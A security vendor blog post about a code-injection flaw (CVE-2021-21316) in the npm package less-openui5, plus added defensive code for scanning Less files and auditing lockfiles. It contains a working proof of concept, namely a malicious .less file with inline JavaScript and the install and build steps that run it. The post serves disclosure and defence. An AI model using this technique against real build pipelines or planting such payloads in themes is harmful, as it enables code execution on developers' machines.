# From PRISMA-ID to CVE: Identifying Open Source Vulnerabilities

By [Shaul Ben Hai](https://www.paloaltonetworks.com/blog/author/shaul-ben-hai/?ts=markdown "Posts by Shaul Ben Hai"), Jul 23, 2021, 4 minutes

[Cloud Workload Protection Platform](https://www.paloaltonetworks.com/blog/cloud-security/category/cloud-workload-protection-platform/?ts=markdown), [Data Security](https://www.paloaltonetworks.com/blog/category/data-security/?ts=markdown), [CVE](https://www.paloaltonetworks.com/blog/tag/cve/?ts=markdown), [Open Source](https://www.paloaltonetworks.com/blog/tag/open-source/?ts=markdown), [Vulnerability Management](https://www.paloaltonetworks.com/blog/tag/vulnerability-management/?ts=markdown)

## Executive Summary

Open source code has experienced tremendous growth in recent years and is used by companies across all kinds of industries. Time, money, rapid development, shorter development life cycles, and innovation are only a partial list of the reasons why open-source frameworks and libraries have become so popular and so widely adopted by developers. The use of open-source frameworks and libraries grew by dozens of percent compared to the previous year and is expected to continue to expand.

Open-source adoption creates new security challenges for software developers, since many developers take code from open source libraries and deploy it as-is. Most developers are unaware of how many dependencies they deploy and how many security issues, or even well-documented open source vulnerabilities, those dependencies carry. Vulnerabilities in open source frameworks and libraries are not always reported to NVD, and even once reported, it can take a long time until they are added to the feed. The time between the first public disclosure of a vulnerability and its addition to the NVD can be days and in some cases even several weeks.

In this blog post, I will discuss an open-source vulnerability that was found 17 days before it became an official CVE and demonstrate how it could have been exploited.

## The Vulnerability

less-openui5 is an open-source npm package that enables building OpenUI5 themes with Less.js. Before version 0.10.0, JavaScript code could be executed in the context of the build process when processing theming resources (i.e. `*.less` files) with less-openui5. An attacker could create a library or themes containing malicious JavaScript code in one of the `.less` files.

##### What is `.less`?

Less (Leaner Style Sheets) is a cross-browser style sheet language. It extends the capabilities of CSS (Cascading Style Sheets); Less is compiled into CSS and can run on the client side or the server side.
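Because the attack surface here is a theming resource rather than application code, a defender's first question is whether any `.less` file that reaches the build carries inline JavaScript at all. Less.js writes inline JavaScript between backticks, so the check below walks each Less source and reports every backtick expression while ignoring backticks that sit inside `//` comments, `/* */` comments or quoted strings, where Less treats them as text. This is an added example written for this page, not code from less-openui5 or Less.js; the `SAMPLE_THEME` files are constructed to mirror the payload shape discussed in this post plus a benign file, and `findInlineJavaScript` and `scanTheme` are hypothetical helper names.

```javascript
// Added example (not part of less-openui5 or Less.js): a pre-build check that
// flags inline JavaScript in Less sources. Less.js inline JavaScript is written
// between backticks; that is the construct a build with javascriptEnabled runs.

// Return every backtick expression in one Less source with its starting line.
// Backticks inside // comments, /* */ comments and quoted strings are skipped,
// because Less treats those as text, not as code to evaluate.
function findInlineJavaScript(source) {
  const findings = [];
  const n = source.length;
  let i = 0;
  let line = 1;

  // Advance i to stop while keeping the line counter in step.
  const skipTo = (stop) => {
    for (; i < stop; i++) if (source[i] === '\n') line++;
  };

  while (i < n) {
    const c = source[i];
    const next = source[i + 1];
    if (c === '/' && next === '/') {            // line comment
      const end = source.indexOf('\n', i);
      skipTo(end === -1 ? n : end);
    } else if (c === '/' && next === '*') {     // block comment
      const end = source.indexOf('*/', i + 2);
      skipTo(end === -1 ? n : end + 2);
    } else if (c === '"' || c === "'") {        // quoted string, with \ escapes
      let j = i + 1;
      while (j < n && source[j] !== c) j += source[j] === '\\' ? 2 : 1;
      skipTo(Math.min(j + 1, n));
    } else if (c === '`') {                     // inline JavaScript expression
      const end = source.indexOf('`', i + 1);
      const stop = end === -1 ? n : end;
      findings.push({ line, code: source.slice(i + 1, stop) });
      skipTo(Math.min(stop + 1, n));
    } else {
      skipTo(i + 1);
    }
  }
  return findings;
}

// Scan a whole theme (file name -> Less source) and collect all findings.
function scanTheme(files) {
  const report = [];
  for (const [file, source] of Object.entries(files)) {
    for (const f of findInlineJavaScript(source)) {
      report.push({ file, line: f.line, code: f.code });
    }
  }
  return report;
}

// Constructed sample: one file with an inline JavaScript expression of the
// shape shown in the post, and one benign file whose backticks appear only in
// comments and inside a quoted string.
const SAMPLE_THEME = {
  'exploit.less': [
    '.rule {',
    "  @var: `(function(){console.log('Pwn by Unit42'); process.exit(0);})()`;",
    '  color: @var;',
    '}',
  ].join('\n'),
  'benign.less': [
    '// a `backtick` in a comment is not evaluated',
    '/* nor in a',
    '   block `comment` */',
    '.title {',
    '  content: "quoted `text` is a string literal";',
    '  color: #333;',
    '}',
  ].join('\n'),
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanTheme(SAMPLE_THEME)) {
    console.log(`${f.file}:${f.line}: inline JavaScript: ${f.code}`);
  }
}
```

Run as a pre-build step over the theme directory, a non-empty report is a reason to stop the build: nothing in a stylesheet needs to call `process.exit` or touch the file system, so any hit deserves a look before the theme is compiled.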
[![Exploitation proof of concept](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/10/Exploit-.less_.png)](https://youtu.be/vDPlNwaDY4E)

Click to watch a video of the exploitation proof of concept.

Before less-openui5 version 0.10.0, the Less.js parser option `javascriptEnabled` existed, and with it JavaScript execution could be enabled for `.less` files. The vulnerable code evaluates JavaScript embedded in the `.less` file content when the ternary condition holds, that is, when the value is a `tree.JavaScript` node:

```javascript
e: function (str) {
    return new(tree.Anonymous)(str instanceof tree.JavaScript ? str.evaluated : str);
}
```

Based on this, I created a simple malicious `.less` file:

```less
.rule {
  @var: `(function(){console.log('Pwn by Unit42'); process.exit(0);})()`;
  color: @var;
}
```

![Creating the malicious file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/07/word-image-39.png)

Creating the malicious file

Now, I can install and include the vulnerable version of the package:

```shell
npm install less-openui5@0.9.0
```

```javascript
var lessOpenUI5 = require('less-openui5')
```

Create a builder instance:

```javascript
var builder = new lessOpenUI5.Builder()
```

Start the build process to build a theme (I used `lessInputPath` instead of `lessInput` to specify a file on my computer):

```javascript
builder.build({lessInputPath: '/Users/sbenhai/exploit.less'});
```

```
Promise { }
> Pwn by Unit42
```

![Installing and including the vulnerable version of the package](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/07/word-image-40.png)

Installing and including the vulnerable version of the package

## Prisma Cloud Detects Vulnerabilities Fast

On January 29th, 2021, less-openui5 released v0.10.0 with a security fix that disables JavaScript execution in Less.js: the parser option `javascriptEnabled` was removed, so JavaScript is always disabled and cannot be enabled. On January 30th, Prisma Cloud caught this security fix and created a candidate for possible vulnerability issues.
Prisma Cloud researchers immediately identified the vulnerability and the vulnerable code and assigned a new PRISMA-ID for Prisma Cloud customers. On February 16th this vulnerability became CVE-2021-21316 and was published by NVD. Prisma Cloud customers benefited from early detection of this vulnerability, in this case 17 days before it was published by the official NVD feeds.

It should be noted that Prisma Cloud encourages open source maintainers to release CVEs in a timely manner. However, sometimes vulnerabilities are released to the public in the form of advisories, issues or PRs before a CVE has been published, and PRISMA IDs were created to provide protection to Prisma Cloud users in the interim.

## How Prisma Cloud Protects You

Unit 42 researchers actively monitor and search for open source vulnerabilities in the source code, commits, and discussions of open-source frameworks and libraries, using a variety of methods and tools. Unit 42 researchers detect new vulnerabilities that were only recently disclosed and even vulnerabilities that were quietly patched. They then identify the vulnerabilities that Prisma Cloud customers need to be aware of and create an internal CVE, the PRISMA-ID. Unit 42 researchers continue to monitor and track open-source libraries, and once a CVE is assigned, the CVE takes over the PRISMA-ID. To learn more about this, check out our [blog post about open source vulnerability management](http://paloaltonetworks.com/blog/prisma-cloud/open-source-vulnerability-management).
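The interim between a silent fix and an NVD entry is only useful to a defender if the vendor identifier can be matched against what is actually installed, including transitive copies, and if the record survives the hand-over to the CVE. The example below, written for this page and not Prisma Cloud's code, models that: a hand-rolled `major.minor.patch` comparison against the advisory's fixed version (0.10.0 for less-openui5, from the post), a walk over a package-lock style tree that reports every affected copy with the path that pulls it in, and `adoptCve`, which makes the CVE the primary identifier while keeping the vendor ID as an alias. The `PRISMA-ID-PLACEHOLDER` value and the `SAMPLE_LOCK` tree are constructed; the dates are the ones the post gives (fix caught January 30th, CVE-2021-21316 published February 16th).

```javascript
// Added example (not Prisma Cloud code): audit a dependency tree against an
// advisory whose only identifier, at first, is a vendor ID, then fold in the
// CVE once NVD publishes it. The PRISMA-ID value below is a placeholder.

// Parse "major.minor.patch"; a pre-release or build suffix is ignored.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unsupported version string: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// -1, 0 or 1 as a is lower than, equal to or higher than b.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Advisory as it looks before a CVE exists: every release below fixedIn is
// affected (the post's less-openui5 case, fixed in 0.10.0).
const ADVISORY = {
  package: 'less-openui5',
  fixedIn: '0.10.0',
  ids: ['PRISMA-ID-PLACEHOLDER'],  // placeholder vendor ID, not a real one
  detected: '2021-01-30',          // date the fix was caught, from the post
};

function isAffected(advisory, version) {
  return compareVersions(version, advisory.fixedIn) < 0;
}

// Walk a package-lock style tree ({ dependencies: { name: { version,
// dependencies } } }) and report every copy, direct or transitive, that the
// advisory covers, together with the path that pulls it in.
function findAffected(advisory, node, path = [], out = []) {
  for (const [name, info] of Object.entries(node.dependencies || {})) {
    const here = [...path, `${name}@${info.version}`];
    if (name === advisory.package && isAffected(advisory, info.version)) {
      out.push({ path: here.join(' > '), version: info.version, ids: advisory.ids });
    }
    findAffected(advisory, info, here, out);
  }
  return out;
}

// Once NVD publishes the CVE it becomes the primary ID; the vendor ID stays as
// an alias so earlier findings remain searchable. leadDays is how long the
// vendor ID was the only handle on the issue.
function adoptCve(advisory, cveId, publishedOn) {
  const ms = Date.parse(publishedOn) - Date.parse(advisory.detected);
  return {
    ...advisory,
    cve: cveId,
    ids: [cveId, ...advisory.ids],
    leadDays: Math.round(ms / 86400000),
  };
}

// Constructed lockfile: one direct vulnerable copy, one fixed transitive copy
// and one older transitive copy hidden under another package.
const SAMPLE_LOCK = {
  dependencies: {
    'less-openui5': { version: '0.9.0' },
    'my-theme-tools': {
      version: '1.2.0',
      dependencies: { 'less-openui5': { version: '0.10.0' } },
    },
    'legacy-build': {
      version: '2.0.0',
      dependencies: { 'less-openui5': { version: '0.8.5' } },
    },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const hit of findAffected(ADVISORY, SAMPLE_LOCK)) {
    console.log(`${hit.path}: affected (${hit.ids.join(', ')})`);
  }
  const updated = adoptCve(ADVISORY, 'CVE-2021-21316', '2021-02-16');
  console.log(`${updated.cve} published ${updated.leadDays} days after detection`);
}
```

The transitive copy under `legacy-build` is the case the executive summary warns about: it never appears in the application's own `package.json`, so a check that only reads direct dependencies would miss it. Keeping the vendor ID in `ids` after the CVE arrives means a finding raised during the 17-day window still resolves to the same record afterwards.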